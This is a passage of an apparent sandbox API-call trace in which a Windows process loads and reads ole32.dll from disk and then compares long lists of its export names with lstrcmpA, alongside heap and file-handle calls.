lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0189.050] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0189.050] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0189.050] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0189.425] GetProcessHeap () returned 0x4a0000 [0189.425] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d52010 | out: hHeap=0x4a0000) returned 1 [0189.433] GetProcessHeap () returned 0x4a0000 [0189.433] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9020 [0189.434] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0189.434] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0189.434] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0189.435] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0189.435] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0189.435] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0189.436] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0189.436] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0189.436] GetProcessHeap () returned 0x4a0000 [0189.436] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x142d00) returned 0x411c040 [0189.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0189.609] ReadFile (in: hFile=0x140, lpBuffer=0x411c040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x411c040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0189.633] CloseHandle (hObject=0x140) returned 1 [0189.633] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0189.633] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0189.633] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0189.633] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0189.633] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0189.634] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0189.635] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0189.635] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0189.635] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0189.635] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0189.635] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0189.635] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0189.635] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0189.635] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0189.636] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0189.637] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0189.637] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0189.638] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0189.638] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0189.639] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0189.640] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0189.640] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0189.640] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0189.640] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0189.640] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0189.640] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0189.640] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0189.640] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0189.640] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0189.641] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0189.642] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0189.642] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0189.642] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0189.642] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0189.642] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0189.642] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0189.642] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0189.642] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0189.642] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0189.642] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0189.642] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0189.642] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0189.642] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0189.833] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0189.833] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0189.833] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0189.833] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0189.833] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0189.833] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0189.833] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0189.833] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0189.834] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0189.835] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0189.835] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0189.835] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0189.835] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0189.835] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0189.835] lstrcmpA 